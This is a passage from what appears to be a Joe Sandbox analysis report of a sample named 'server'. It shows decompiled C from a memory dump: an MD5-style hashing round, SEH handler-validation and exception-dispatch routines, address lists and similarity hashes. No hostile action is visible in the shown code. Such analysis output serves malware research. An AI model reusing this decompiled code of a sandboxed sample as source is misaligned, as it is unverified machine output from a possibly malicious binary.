                				asm("rol eax, 0x7");
                				_t231 = ( !_t685 & _t351 | _t404 & _v8) + _v60 + _t229 - 0xa83f051 + _t690;
                				asm("rol ecx, 0xc");
                				_t353 = ( !_t231 & _t404 | _t690 & _t231) + _v56 + _t351 + 0x4787c62a + _t231;
                				asm("ror edx, 0xf");
                				_t406 = ( !_t353 & _t690 | _t353 & _t231) + _v52 + _t404 - 0x57cfb9ed + _t353;
                				asm("ror esi, 0xa");
                				_t692 = ( !_t406 & _t231 | _t353 & _t406) + _v48 + _t690 - 0x2b96aff + _t406;
                				_v8 = _t692;
                				_t697 = _v8;
                				asm("rol eax, 0x7");
                				_t233 = ( !_t692 & _t353 | _t406 & _v8) + _v44 + _t231 + 0x698098d8 + _t697;
                				asm("rol ecx, 0xc");
                				_t355 = ( !_t233 & _t406 | _t697 & _t233) + _v40 + _t353 - 0x74bb0851 + _t233;
                				asm("ror edx, 0xf");
                				_t408 = ( !_t355 & _t697 | _t355 & _t233) + _v36 + _t406 - 0xa44f + _t355;
                				asm("ror esi, 0xa");
                				_t699 = ( !_t408 & _t233 | _t355 & _t408) + _v32 + _t697 - 0x76a32842 + _t408;
                				_v8 = _t699;
                				asm("rol eax, 0x7");
                				_t235 = ( !_t699 & _t355 | _t408 & _v8) + _v28 + _t233 + 0x6b901122 + _v8;
                				asm("rol ecx, 0xc");
                				_t357 = ( !_t235 & _t408 | _v8 & _t235) + _v24 + _t355 - 0x2678e6d + _t235;
                				_t508 =  !_t357;
                				asm("ror edx, 0xf");
                				_t410 = (_t508 & _v8 | _t357 & _t235) + _v20 + _t408 - 0x5986bc72 + _t357;
                				_v12 = _t410;
                				_v12 =  !_v12;
                				asm("ror esi, 0xa");
                				_t718 = (_v12 & _t235 | _t357 & _t410) + _v16 + _v8 + 0x49b40821 + _t410;
                				asm("rol eax, 0x5");
                				_t237 = (_t508 & _t410 | _t357 & _t718) + _v72 + _t235 - 0x9e1da9e + _t718;
                				asm("rol ecx, 0x9");
                				_t359 = (_v12 & _t718 | _t410 & _t237) + _v52 + _t357 - 0x3fbf4cc0 + _t237;
                				asm("rol edx, 0xe");
                				_t412 = ( !_t718 & _t237 | _t359 & _t718) + _v32 + _t410 + 0x265e5a51 + _t359;
                				asm("ror esi, 0xc");
                				_t720 = ( !_t237 & _t359 | _t412 & _t237) + _v76 + _t718 - 0x16493856 + _t412;
                				asm("rol eax, 0x5");
                				_t239 = ( !_t359 & _t412 | _t359 & _t720) + _v56 + _t237 - 0x29d0efa3 + _t720;
                				asm("rol ecx, 0x9");
                				_t361 = ( !_t412 & _t720 | _t412 & _t239) + _v36 + _t359 + 0x2441453 + _t239;
                				asm("rol edx, 0xe");
                				_t414 = ( !_t720 & _t239 | _t361 & _t720) + _v16 + _t412 - 0x275e197f + _t361;
                				asm("ror esi, 0xc");
                				_t722 = ( !_t239 & _t361 | _t414 & _t239) + _v60 + _t720 - 0x182c0438 + _t414;
                				asm("rol eax, 0x5");
                				_t241 = ( !_t361 & _t414 | _t361 & _t722) + _v40 + _t239 + 0x21e1cde6 + _t722;
                				asm("rol ecx, 0x9");
                				_t363 = ( !_t414 & _t722 | _t414 & _t241) + _v20 + _t361 - 0x3cc8f82a + _t241;
                				asm("rol edx, 0xe");
                				_t416 = ( !_t722 & _t241 | _t363 & _t722) + _v64 + _t414 - 0xb2af279 + _t363;
                				asm("ror esi, 0xc");
                				_t724 = ( !_t241 & _t363 | _t416 & _t241) + _v44 + _t722 + 0x455a14ed + _t416;
                				asm("rol eax, 0x5");
                				_t243 = ( !_t363 & _t416 | _t363 & _t724) + _v24 + _t241 - 0x561c16fb + _t724;
                				asm("rol ecx, 0x9");
                				_t365 = ( !_t416 & _t724 | _t416 & _t243) + _v68 + _t363 - 0x3105c08 + _t243;
                				asm("rol edx, 0xe");
                				_t418 = ( !_t724 & _t243 | _t365 & _t724) + _v48 + _t416 + 0x676f02d9 + _t365;
                				asm("ror esi, 0xc");
                				_t726 = ( !_t243 & _t365 | _t418 & _t243) + _v28 + _t724 - 0x72d5b376 + _t418;
                				asm("rol eax, 0x4");
                				_t245 = (_t365 ^ _t418 ^ _t726) + _v56 + _t243 - 0x5c6be + _t726;
                				asm("rol ecx, 0xb");
                				_t367 = (_t418 ^ _t726 ^ _t245) + _v44 + _t365 - 0x788e097f + _t245;
                				asm("rol edx, 0x10");
                				_t420 = (_t367 ^ _t726 ^ _t245) + _v32 + _t418 + 0x6d9d6122 + _t367;
                				_t599 = _t367 ^ _t420;
                				asm("ror esi, 0x9");
                				_t728 = (_t599 ^ _t245) + _v20 + _t726 - 0x21ac7f4 + _t420;
                				asm("rol eax, 0x4");
                				_t247 = (_t599 ^ _t728) + _v72 + _t245 - 0x5b4115bc + _t728;
                				asm("rol edi, 0xb");
                				_t607 = (_t420 ^ _t728 ^ _t247) + _v60 + _t367 + 0x4bdecfa9 + _t247;
                				asm("rol edx, 0x10");
                				_t422 = (_t607 ^ _t728 ^ _t247) + _v48 + _t420 - 0x944b4a0 + _t607;
                				_t338 = _t607 ^ _t422;
                				asm("ror ecx, 0x9");
                				_t376 = (_t338 ^ _t247) + _v36 + _t728 - 0x41404390 + _t422;
                				asm("rol eax, 0x4");
                				_t249 = (_t338 ^ _t376) + _v24 + _t247 + 0x289b7ec6 + _t376;
                				asm("rol esi, 0xb");
                				_t734 = (_t422 ^ _t376 ^ _t249) + _v76 + _t607 - 0x155ed806 + _t249;
                				asm("rol edi, 0x10");
                				_t613 = (_t734 ^ _t376 ^ _t249) + _v64 + _t422 - 0x2b10cf7b + _t734;
                				_t424 = _t734 ^ _t613;
                				asm("ror ecx, 0x9");
                				_t378 = (_t424 ^ _t249) + _v52 + _t376 + 0x4881d05 + _t613;
                				asm("rol eax, 0x4");
                				_t251 = (_t424 ^ _t378) + _v40 + _t249 - 0x262b2fc7 + _t378;
                				asm("rol edx, 0xb");
                				_t432 = (_t613 ^ _t378 ^ _t251) + _v28 + _t734 - 0x1924661b + _t251;
                				asm("rol esi, 0x10");
                				_t740 = (_t432 ^ _t378 ^ _t251) + _v16 + _t613 + 0x1fa27cf8 + _t432;
                				asm("ror ecx, 0x9");
                				_t380 = (_t432 ^ _t740 ^ _t251) + _v68 + _t378 - 0x3b53a99b + _t740;
                				asm("rol eax, 0x6");
                				_t253 = (( !_t432 | _t380) ^ _t740) + _v76 + _t251 - 0xbd6ddbc + _t380;
                				asm("rol edx, 0xa");
                				_t434 = (( !_t740 | _t253) ^ _t380) + _v48 + _t432 + 0x432aff97 + _t253;
                				asm("rol esi, 0xf");
                				_t742 = (( !_t380 | _t434) ^ _t253) + _v20 + _t740 - 0x546bdc59 + _t434;
                				asm("ror ecx, 0xb");
                				_t382 = (( !_t253 | _t742) ^ _t434) + _v56 + _t380 - 0x36c5fc7 + _t742;
                				asm("rol eax, 0x6");
                				_t255 = (( !_t434 | _t382) ^ _t742) + _v28 + _t253 + 0x655b59c3 + _t382;
                				asm("rol edx, 0xa");
                				_t436 = (( !_t742 | _t255) ^ _t382) + _v64 + _t434 - 0x70f3336e + _t255;
                				asm("rol esi, 0xf");
                				_t744 = (( !_t382 | _t436) ^ _t255) + _v36 + _t742 - 0x100b83 + _t436;
                				asm("ror ecx, 0xb");
                				_t384 = (( !_t255 | _t744) ^ _t436) + _v72 + _t382 - 0x7a7ba22f + _t744;
                				asm("rol eax, 0x6");
                				_t257 = (( !_t436 | _t384) ^ _t744) + _v44 + _t255 + 0x6fa87e4f + _t384;
                				asm("rol edx, 0xa");
                				_t438 = (( !_t744 | _t257) ^ _t384) + _v16 + _t436 - 0x1d31920 + _t257;
                				asm("rol esi, 0xf");
                				_t746 = (( !_t384 | _t438) ^ _t257) + _v52 + _t744 - 0x5cfebcec + _t438;
                				asm("ror edi, 0xb");
                				_t679 = (( !_t257 | _t746) ^ _t438) + _v24 + _t384 + 0x4e0811a1 + _t746;
                				asm("rol eax, 0x6");
                				_t259 = (( !_t438 | _t679) ^ _t746) + _v60 + _t257 - 0x8ac817e + _t679;
                				asm("rol edx, 0xa");
                				_t440 = (( !_t746 | _t259) ^ _t679) + _v32 + _t438 - 0x42c50dcb + _t259;
                				_t400 = _a4;
                				asm("rol esi, 0xf");
                				_t748 = (( !_t679 | _t440) ^ _t259) + _v68 + _t746 + 0x2ad7d2bb + _t440;
                				 *_t400 =  *_t400 + _t259;
                				asm("ror eax, 0xb");
                				 *((intOrPtr*)(_t400 + 4)) = (( !_t259 | _t748) ^ _t440) + _v40 + _t679 - 0x14792c6f +  *((intOrPtr*)(_t400 + 4)) + _t748;
                				 *((intOrPtr*)(_t400 + 8)) =  *((intOrPtr*)(_t400 + 8)) + _t748;
                				 *((intOrPtr*)(_t400 + 0xc)) =  *((intOrPtr*)(_t400 + 0xc)) + _t440;
                				return memset( &_v76, 0, 0x40);
                			}


































































































                0x022216e2
                0x022216ed
                0x022216f0
                0x022216f3
                0x022216f4
                0x02221712
                0x02221714
                0x02221717
                0x0222171a
                0x0222171a
                0x0222171d
                0x0222171d
                0x02221720
                0x02221720
                0x02221723
                0x02221723
                0x02221740
                0x02221743
                0x02221759
                0x0222175c
                0x02221776
                0x02221779
                0x0222178f
                0x02221792
                0x02221794
                0x022217ac
                0x022217af
                0x022217b2
                0x022217ca
                0x022217cd
                0x022217e7
                0x022217ea
                0x02221800
                0x02221803
                0x02221805
                0x0222181d
                0x02221822
                0x02221825
                0x0222183b
                0x0222183e
                0x02221858
                0x0222185b
                0x02221871
                0x02221874
                0x02221876
                0x02221891
                0x02221894
                0x022218ab
                0x022218ae
                0x022218b2
                0x022218cb
                0x022218ce
                0x022218d0
                0x022218d3
                0x022218ee
                0x022218f1
                0x0222190a
                0x0222190d
                0x0222191d
                0x02221920
                0x02221938
                0x0222193b
                0x02221955
                0x02221958
                0x02221970
                0x02221973
                0x02221989
                0x0222198c
                0x022219a4
                0x022219a7
                0x022219bf
                0x022219c2
                0x022219dc
                0x022219df
                0x022219f5
                0x022219f8
                0x02221a10
                0x02221a13
                0x02221a2d
                0x02221a30
                0x02221a48
                0x02221a4b
                0x02221a61
                0x02221a64
                0x02221a7c
                0x02221a7f
                0x02221a97
                0x02221a9a
                0x02221aac
                0x02221aaf
                0x02221ac1
                0x02221ac4
                0x02221ad6
                0x02221ad9
                0x02221add
                0x02221aed
                0x02221af0
                0x02221afe
                0x02221b01
                0x02221b13
                0x02221b16
                0x02221b2a
                0x02221b2d
                0x02221b2f
                0x02221b3f
                0x02221b42
                0x02221b54
                0x02221b57
                0x02221b65
                0x02221b68
                0x02221b7a
                0x02221b7d
                0x02221b81
                0x02221b91
                0x02221b94
                0x02221ba6
                0x02221ba9
                0x02221bb7
                0x02221bba
                0x02221bcc
                0x02221bcf
                0x02221be1
                0x02221be4
                0x02221bf8
                0x02221bfb
                0x02221c0f
                0x02221c12
                0x02221c26
                0x02221c29
                0x02221c3d
                0x02221c40
                0x02221c54
                0x02221c57
                0x02221c6b
                0x02221c70
                0x02221c82
                0x02221c85
                0x02221c99
                0x02221c9c
                0x02221cb0
                0x02221cb3
                0x02221cc9
                0x02221ccc
                0x02221ce0
                0x02221ce3
                0x02221cf5
                0x02221cf8
                0x02221d0c
                0x02221d0f
                0x02221d23
                0x02221d26
                0x02221d3a
                0x02221d43
                0x02221d46
                0x02221d4f
                0x02221d58
                0x02221d60
                0x02221d68
                0x02221d72
                0x02221d87

                APIs
                Memory Dump Source
                • Source File: 00000000.00000002.517761625.0000000002221000.00000020.10000000.00040000.00000000.sdmp, Offset: 02220000, based on PE: true
                • Associated: 00000000.00000002.517752563.0000000002220000.00000004.10000000.00040000.00000000.sdmpDownload File
                • Associated: 00000000.00000002.517778721.0000000002229000.00000002.10000000.00040000.00000000.sdmpDownload File
                • Associated: 00000000.00000002.517787058.000000000222A000.00000004.10000000.00040000.00000000.sdmpDownload File
                • Associated: 00000000.00000002.517798246.000000000222C000.00000002.10000000.00040000.00000000.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_2220000_server.jbxd
                Similarity
                • API ID: memset
                • String ID:
                • API String ID: 2221118986-0
                • Opcode ID: 731c4c0f351f3efb1da8e5c57353aa3635b345d7971c0b598f3b3c7e53c72fd3
                • Instruction ID: 8de83e9921e012c76375883c3156189f67390b5df7c3f8de6ebba833ef174f61
                • Opcode Fuzzy Hash: 731c4c0f351f3efb1da8e5c57353aa3635b345d7971c0b598f3b3c7e53c72fd3
                • Instruction Fuzzy Hash: 8822857BE516169BDB08CA95CC805E9B3E3BBC832471F9179C919E3305EE797A0786C0
                Uniqueness

                Uniqueness Score: -1.00%

                C-Code - Quality: 100%
                			E02228551(long _a4) {
                				intOrPtr _v8;
                				intOrPtr _v12;
                				signed int _v16;
                				short* _v32;
                				void _v36;
                				void* _t57;
                				signed int _t58;
                				signed int _t61;
                				signed int _t62;
                				void* _t63;
                				signed int* _t68;
                				intOrPtr* _t69;
                				intOrPtr* _t71;
                				intOrPtr _t72;
                				intOrPtr _t75;
                				void* _t76;
                				signed int _t77;
                				void* _t78;
                				void _t80;
                				signed int _t81;
                				signed int _t84;
                				signed int _t86;
                				short* _t87;
                				void* _t89;
                				signed int* _t90;
                				long _t91;
                				signed int _t93;
                				signed int _t94;
                				signed int _t100;
                				signed int _t102;
                				void* _t104;
                				long _t108;
                				signed int _t110;
                
                				_t108 = _a4;
                				_t76 =  *(_t108 + 8);
                				if((_t76 & 0x00000003) != 0) {
                					L3:
                					return 0;
                				}
                				_a4 =  *[fs:0x4];
                				_v8 =  *[fs:0x8];
                				if(_t76 < _v8 || _t76 >= _a4) {
                					_t102 =  *(_t108 + 0xc);
                					__eflags = _t102 - 0xffffffff;
                					if(_t102 != 0xffffffff) {
                						_t91 = 0;
                						__eflags = 0;
                						_a4 = 0;
                						_t57 = _t76;
                						do {
                							_t80 =  *_t57;
                							__eflags = _t80 - 0xffffffff;
                							if(_t80 == 0xffffffff) {
                								goto L9;
                							}
                							__eflags = _t80 - _t91;
                							if(_t80 >= _t91) {
                								L20:
                								_t63 = 0;
                								L60:
                								return _t63;
                							}
                							L9:
                							__eflags =  *(_t57 + 4);
                							if( *(_t57 + 4) != 0) {
                								_t12 =  &_a4;
                								 *_t12 = _a4 + 1;
                								__eflags =  *_t12;
                							}
                							_t91 = _t91 + 1;
                							_t57 = _t57 + 0xc;
                							__eflags = _t91 - _t102;
                						} while (_t91 <= _t102);
                						__eflags = _a4;
                						if(_a4 == 0) {
                							L15:
                							_t81 =  *0x222a380; // 0x0
                							_t110 = _t76 & 0xfffff000;
                							_t58 = 0;
                							__eflags = _t81;
                							if(_t81 <= 0) {
                								L18:
                								_t104 = _t102 | 0xffffffff;
                								_t61 = NtQueryVirtualMemory(_t104, _t76, 0,  &_v36, 0x1c,  &_a4);
                								__eflags = _t61;
                								if(_t61 < 0) {
                									_t62 = 0;
                									__eflags = 0;
                								} else {
                									_t62 = _a4;
                								}
                								__eflags = _t62;
                								if(_t62 == 0) {
                									L59:
                									_t63 = _t104;
                									goto L60;
                								} else {
                									__eflags = _v12 - 0x1000000;
                									if(_v12 != 0x1000000) {
                										goto L59;
                									}
                									__eflags = _v16 & 0x000000cc;
                									if((_v16 & 0x000000cc) == 0) {
                										L46:
                										_t63 = 1;
                										 *0x222a3c8 = 1;
                										__eflags =  *0x222a3c8;
                										if( *0x222a3c8 != 0) {
                											goto L60;
                										}
                										_t84 =  *0x222a380; // 0x0
                										__eflags = _t84;
                										_t93 = _t84;
                										if(_t84 <= 0) {
                											L51:
                											__eflags = _t93;
                											if(_t93 != 0) {
                												L58:
                												 *0x222a3c8 = 0;
                												goto L5;
                											}
                											_t77 = 0xf;
                											__eflags = _t84 - _t77;
                											if(_t84 <= _t77) {
                												_t77 = _t84;
                											}
                											_t94 = 0;
                											__eflags = _t77;
                											if(_t77 < 0) {
                												L56:
                												__eflags = _t84 - 0x10;
                												if(_t84 < 0x10) {
                													_t86 = _t84 + 1;
                													__eflags = _t86;
                													 *0x222a380 = _t86;
                												}
                												goto L58;
                											} else {
                												do {
                													_t68 = 0x222a388 + _t94 * 4;
                													_t94 = _t94 + 1;
                													__eflags = _t94 - _t77;
                													 *_t68 = _t110;
                													_t110 =  *_t68;
                												} while (_t94 <= _t77);
                												goto L56;
                											}
                										}
                										_t69 = 0x222a384 + _t84 * 4;
                										while(1) {
                											__eflags =  *_t69 - _t110;
                											if( *_t69 == _t110) {
                												goto L51;
                											}
                											_t93 = _t93 - 1;
                											_t69 = _t69 - 4;
                											__eflags = _t93;
                											if(_t93 > 0) {
                												continue;
                											}
                											goto L51;
                										}
                										goto L51;
                									}
                									_t87 = _v32;
                									__eflags =  *_t87 - 0x5a4d;
                									if( *_t87 != 0x5a4d) {
                										goto L59;
                									}
                									_t71 =  *((intOrPtr*)(_t87 + 0x3c)) + _t87;
                									__eflags =  *_t71 - 0x4550;
                									if( *_t71 != 0x4550) {
                										goto L59;
                									}
                									__eflags =  *((short*)(_t71 + 0x18)) - 0x10b;
                									if( *((short*)(_t71 + 0x18)) != 0x10b) {
                										goto L59;
                									}
                									_t78 = _t76 - _t87;
                									__eflags =  *((short*)(_t71 + 6));
                									_t89 = ( *(_t71 + 0x14) & 0x0000ffff) + _t71 + 0x18;
                									if( *((short*)(_t71 + 6)) <= 0) {
                										goto L59;
                									}
                									_t72 =  *((intOrPtr*)(_t89 + 0xc));
                									__eflags = _t78 - _t72;
                									if(_t78 < _t72) {
                										goto L46;
                									}
                									__eflags = _t78 -  *((intOrPtr*)(_t89 + 8)) + _t72;
                									if(_t78 >=  *((intOrPtr*)(_t89 + 8)) + _t72) {
                										goto L46;
                									}
                									__eflags =  *(_t89 + 0x27) & 0x00000080;
                									if(( *(_t89 + 0x27) & 0x00000080) != 0) {
                										goto L20;
                									}
                									goto L46;
                								}
                							} else {
                								goto L16;
                							}
                							while(1) {
                								L16:
                								__eflags =  *((intOrPtr*)(0x222a388 + _t58 * 4)) - _t110;
                								if( *((intOrPtr*)(0x222a388 + _t58 * 4)) == _t110) {
                									break;
                								}
                								_t58 = _t58 + 1;
                								__eflags = _t58 - _t81;
                								if(_t58 < _t81) {
                									continue;
                								}
                								goto L18;
                							}
                							__eflags = _t58;
                							if(_t58 <= 0) {
                								goto L5;
                							}
                							 *0x222a3c8 = 1;
                							__eflags =  *0x222a3c8;
                							if( *0x222a3c8 != 0) {
                								goto L5;
                							}
                							__eflags =  *((intOrPtr*)(0x222a388 + _t58 * 4)) - _t110;
                							if( *((intOrPtr*)(0x222a388 + _t58 * 4)) == _t110) {
                								L32:
                								_t100 = 0;
                								__eflags = _t58;
                								if(_t58 < 0) {
                									L34:
                									 *0x222a3c8 = 0;
                									goto L5;
                								} else {
                									goto L33;
                								}
                								do {
                									L33:
                									_t90 = 0x222a388 + _t100 * 4;
                									_t100 = _t100 + 1;
                									__eflags = _t100 - _t58;
                									 *_t90 = _t110;
                									_t110 =  *_t90;
                								} while (_t100 <= _t58);
                								goto L34;
                							}
                							_t25 = _t81 - 1; // -1
                							_t58 = _t25;
                							__eflags = _t58;
                							if(_t58 < 0) {
                								L28:
                								__eflags = _t81 - 0x10;
                								if(_t81 < 0x10) {
                									_t81 = _t81 + 1;
                									__eflags = _t81;
                									 *0x222a380 = _t81;
                								}
                								_t28 = _t81 - 1; // 0x0
                								_t58 = _t28;
                								goto L32;
                							} else {
                								goto L25;
                							}
                							while(1) {
                								L25:
                								__eflags =  *((intOrPtr*)(0x222a388 + _t58 * 4)) - _t110;
                								if( *((intOrPtr*)(0x222a388 + _t58 * 4)) == _t110) {
                									break;
                								}
                								_t58 = _t58 - 1;
                								__eflags = _t58;
                								if(_t58 >= 0) {
                									continue;
                								}
                								break;
                							}
                							__eflags = _t58;
                							if(__eflags >= 0) {
                								if(__eflags == 0) {
                									goto L34;
                								}
                								goto L32;
                							}
                							goto L28;
                						}
                						_t75 =  *((intOrPtr*)(_t108 - 8));
                						__eflags = _t75 - _v8;
                						if(_t75 < _v8) {
                							goto L20;
                						}
                						__eflags = _t75 - _t108;
                						if(_t75 >= _t108) {
                							goto L20;
                						}
                						goto L15;
                					}
                					L5:
                					_t63 = 1;
                					goto L60;
                				} else {
                					goto L3;
                				}
                			}




































                0x0222855b
                0x0222855e
                0x02228564
                0x02228582
                0x00000000
                0x02228582
                0x0222856c
                0x02228575
                0x0222857b
                0x0222858a
                0x0222858d
                0x02228590
                0x0222859a
                0x0222859a
                0x0222859c
                0x0222859f
                0x022285a1
                0x022285a1
                0x022285a3
                0x022285a6
                0x00000000
                0x00000000
                0x022285a8
                0x022285aa
                0x02228610
                0x02228610
                0x0222876e
                0x00000000
                0x0222876e
                0x022285ac
                0x022285ac
                0x022285b0
                0x022285b2
                0x022285b2
                0x022285b2
                0x022285b2
                0x022285b5
                0x022285b6
                0x022285b9
                0x022285b9
                0x022285bd
                0x022285c1
                0x022285cf
                0x022285cf
                0x022285d7
                0x022285dd
                0x022285df
                0x022285e1
                0x022285f1
                0x022285fe
                0x02228602
                0x02228607
                0x02228609
                0x02228687
                0x02228687
                0x0222860b
                0x0222860b
                0x0222860b
                0x02228689
                0x0222868b
                0x0222876c
                0x0222876c
                0x00000000
                0x02228691
                0x02228691
                0x02228698
                0x00000000
                0x00000000
                0x0222869e
                0x022286a2
                0x022286fe
                0x02228700
                0x02228708
                0x0222870a
                0x0222870c
                0x00000000
                0x00000000
                0x0222870e
                0x02228714
                0x02228716
                0x02228718
                0x0222872d
                0x0222872d
                0x0222872f
                0x0222875e
                0x02228765
                0x00000000
                0x02228765
                0x02228733
                0x02228734
                0x02228736
                0x02228738
                0x02228738
                0x0222873a
                0x0222873c
                0x0222873e
                0x02228752
                0x02228752
                0x02228755
                0x02228757
                0x02228757
                0x02228758
                0x02228758
                0x00000000
                0x02228740
                0x02228740
                0x02228740
                0x02228749
                0x0222874a
                0x0222874c
                0x0222874e
                0x0222874e
                0x00000000
                0x02228740
                0x0222873e
                0x0222871a
                0x02228721
                0x02228721
                0x02228723
                0x00000000
                0x00000000
                0x02228725
                0x02228726
                0x02228729
                0x0222872b
                0x00000000
                0x00000000
                0x00000000
                0x0222872b
                0x00000000
                0x02228721
                0x022286a4
                0x022286a7
                0x022286ac
                0x00000000
                0x00000000
                0x022286b5
                0x022286b7
                0x022286bd
                0x00000000
                0x00000000
                0x022286c3
                0x022286c9
                0x00000000
                0x00000000
                0x022286cf
                0x022286d1
                0x022286da
                0x022286de
                0x00000000
                0x00000000
                0x022286e4
                0x022286e7
                0x022286e9
                0x00000000
                0x00000000
                0x022286f0
                0x022286f2
                0x00000000
                0x00000000
                0x022286f4
                0x022286f8
                0x00000000
                0x00000000
                0x00000000
                0x022286f8
                0x00000000
                0x00000000
                0x00000000
                0x022285e3
                0x022285e3
                0x022285e3
                0x022285ea
                0x00000000
                0x00000000
                0x022285ec
                0x022285ed
                0x022285ef
                0x00000000
                0x00000000
                0x00000000
                0x022285ef
                0x02228617
                0x02228619
                0x00000000
                0x00000000
                0x02228629
                0x0222862b
                0x0222862d
                0x00000000
                0x00000000
                0x02228633
                0x0222863a
                0x02228666
                0x02228666
                0x02228668
                0x0222866a
                0x0222867e
                0x02228680
                0x00000000
                0x00000000
                0x00000000
                0x00000000
                0x0222866c
                0x0222866c
                0x0222866c
                0x02228675
                0x02228676
                0x02228678
                0x0222867a
                0x0222867a
                0x00000000
                0x0222866c
                0x0222863c
                0x0222863c
                0x0222863f
                0x02228641
                0x02228653
                0x02228653
                0x02228656
                0x02228658
                0x02228658
                0x02228659
                0x02228659
                0x0222865f
                0x0222865f
                0x00000000
                0x00000000
                0x00000000
                0x00000000
                0x02228643
                0x02228643
                0x02228643
                0x0222864a
                0x00000000
                0x00000000
                0x0222864c
                0x0222864c
                0x0222864d
                0x00000000
                0x00000000
                0x00000000
                0x0222864d
                0x0222864f
                0x02228651
                0x02228664
                0x00000000
                0x00000000
                0x00000000
                0x02228664
                0x00000000
                0x02228651
                0x022285c3
                0x022285c6
                0x022285c9
                0x00000000
                0x00000000
                0x022285cb
                0x022285cd
                0x00000000
                0x00000000
                0x00000000
                0x022285cd
                0x02228592
                0x02228594
                0x00000000
                0x00000000
                0x00000000
                0x00000000

                APIs
                • NtQueryVirtualMemory.NTDLL(?,?,00000000,?,0000001C,00000000), ref: 02228602
                Memory Dump Source
                • Source File: 00000000.00000002.517761625.0000000002221000.00000020.10000000.00040000.00000000.sdmp, Offset: 02220000, based on PE: true
                • Associated: 00000000.00000002.517752563.0000000002220000.00000004.10000000.00040000.00000000.sdmpDownload File
                • Associated: 00000000.00000002.517778721.0000000002229000.00000002.10000000.00040000.00000000.sdmpDownload File
                • Associated: 00000000.00000002.517787058.000000000222A000.00000004.10000000.00040000.00000000.sdmpDownload File
                • Associated: 00000000.00000002.517798246.000000000222C000.00000002.10000000.00040000.00000000.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_2220000_server.jbxd
                Similarity
                • API ID: MemoryQueryVirtual
                • String ID:
                • API String ID: 2850889275-0
                • Opcode ID: 53c98587ba963457f1ec09e170f42afcda0f55156e45263c2bcff768a45e85f6
                • Instruction ID: 5f3f3e2efa71cbf5557fb184a8743b5ff8b77137f8b7eab5367b75f2f966cddc
                • Opcode Fuzzy Hash: 53c98587ba963457f1ec09e170f42afcda0f55156e45263c2bcff768a45e85f6
                • Instruction Fuzzy Hash: 3961F634A20232BFDB29CEE8D58077933A6FB85354B258429D406CB69CE773D84DC672
                Uniqueness

                Uniqueness Score: -1.00%

                C-Code - Quality: 71%
                			E0222832C(signed int* __eax, void* __ebx, signed int __edx, char _a4, long _a8, intOrPtr _a12) {
                				intOrPtr _v8;
                				char _v12;
                				void* __ebp;
                				signed int* _t43;
                				char _t44;
                				void* _t46;
                				void* _t49;
                				intOrPtr* _t53;
                				void* _t54;
                				void* _t65;
                				long _t66;
                				signed int* _t80;
                				signed int* _t82;
                				void* _t84;
                				signed int _t86;
                				void* _t89;
                				void* _t95;
                				void* _t96;
                				void* _t99;
                				void* _t106;
                
                				_t43 = _t84;
                				_t65 = __ebx + 2;
                				 *_t43 =  *_t43 ^ __edx ^  *__eax;
                				_t89 = _t95;
                				_t96 = _t95 - 8;
                				_push(_t65);
                				_push(_t84);
                				_push(_t89);
                				asm("cld");
                				_t66 = _a8;
                				_t44 = _a4;
                				if(( *(_t44 + 4) & 0x00000006) != 0) {
                					_push(_t89);
                					E02228497(_t66 + 0x10, _t66, 0xffffffff);
                					_t46 = 1;
                				} else {
                					_v12 = _t44;
                					_v8 = _a12;
                					 *((intOrPtr*)(_t66 - 4)) =  &_v12;
                					_t86 =  *(_t66 + 0xc);
                					_t80 =  *(_t66 + 8);
                					_t49 = E02228551(_t66);
                					_t99 = _t96 + 4;
                					if(_t49 == 0) {
                						 *(_a4 + 4) =  *(_a4 + 4) | 0x00000008;
                						goto L11;
                					} else {
                						while(_t86 != 0xffffffff) {
                							_t53 =  *((intOrPtr*)(_t80 + 4 + (_t86 + _t86 * 2) * 4));
                							if(_t53 == 0) {
                								L8:
                								_t80 =  *(_t66 + 8);
                								_t86 = _t80[_t86 + _t86 * 2];
                								continue;
                							} else {
                								_t54 =  *_t53();
                								_t89 = _t89;
                								_t86 = _t86;
                								_t66 = _a8;
                								_t55 = _t54;
                								_t106 = _t54;
                								if(_t106 == 0) {
                									goto L8;
                								} else {
                									if(_t106 < 0) {
                										_t46 = 0;
                									} else {
                										_t82 =  *(_t66 + 8);
                										E0222843C(_t55, _t66);
                										_t89 = _t66 + 0x10;
                										E02228497(_t89, _t66, 0);
                										_t99 = _t99 + 0xc;
                										E02228533(_t82[2]);
                										 *(_t66 + 0xc) =  *_t82;
                										_t66 = 0;
                										_t86 = 0;
                										 *(_t82[2])(1);
                										goto L8;
                									}
                								}
                							}
                							goto L13;
                						}
                						L11:
                						_t46 = 1;
                					}
                				}
                				L13:
                				return _t46;
                			}























                0x02228330
                0x02228331
                0x02228332
                0x02228335
                0x02228337
                0x0222833a
                0x0222833b
                0x0222833d
                0x0222833e
                0x0222833f
                0x02228342
                0x0222834c
                0x022283fd
                0x02228404
                0x0222840d
                0x02228352
                0x02228352
                0x02228358
                0x0222835e
                0x02228361
                0x02228364
                0x02228368
                0x0222836d
                0x02228372
                0x022283f2
                0x00000000
                0x02228374
                0x02228374
                0x02228380
                0x02228382
                0x022283dd
                0x022283dd
                0x022283e3
                0x00000000
                0x02228384
                0x02228393
                0x02228395
                0x02228396
                0x02228397
                0x0222839a
                0x0222839a
                0x0222839c
                0x00000000
                0x0222839e
                0x0222839e
                0x022283e8
                0x022283a0
                0x022283a0
                0x022283a4
                0x022283ac
                0x022283b1
                0x022283b6
                0x022283c2
                0x022283ca
                0x022283d1
                0x022283d7
                0x022283db
                0x00000000
                0x022283db
                0x0222839e
                0x0222839c
                0x00000000
                0x02228382
                0x022283f6
                0x022283f6
                0x022283f6
                0x02228372
                0x02228412
                0x02228419

                Memory Dump Source
                • Source File: 00000000.00000002.517761625.0000000002221000.00000020.10000000.00040000.00000000.sdmp, Offset: 02220000, based on PE: true
                • Associated: 00000000.00000002.517752563.0000000002220000.00000004.10000000.00040000.00000000.sdmpDownload File
                • Associated: 00000000.00000002.517778721.0000000002229000.00000002.10000000.00040000.00000000.sdmpDownload File
                • Associated: 00000000.00000002.517787058.000000000222A000.00000004.10000000.00040000.00000000.sdmpDownload File
                • Associated: 00000000.00000002.517798246.000000000222C000.00000002.10000000.00040000.00000000.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_2220000_server.jbxd
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: 4f37e18b72ef76f3e50d9b898edfd48ae2b22ba2880acf1ff50920e361efee75
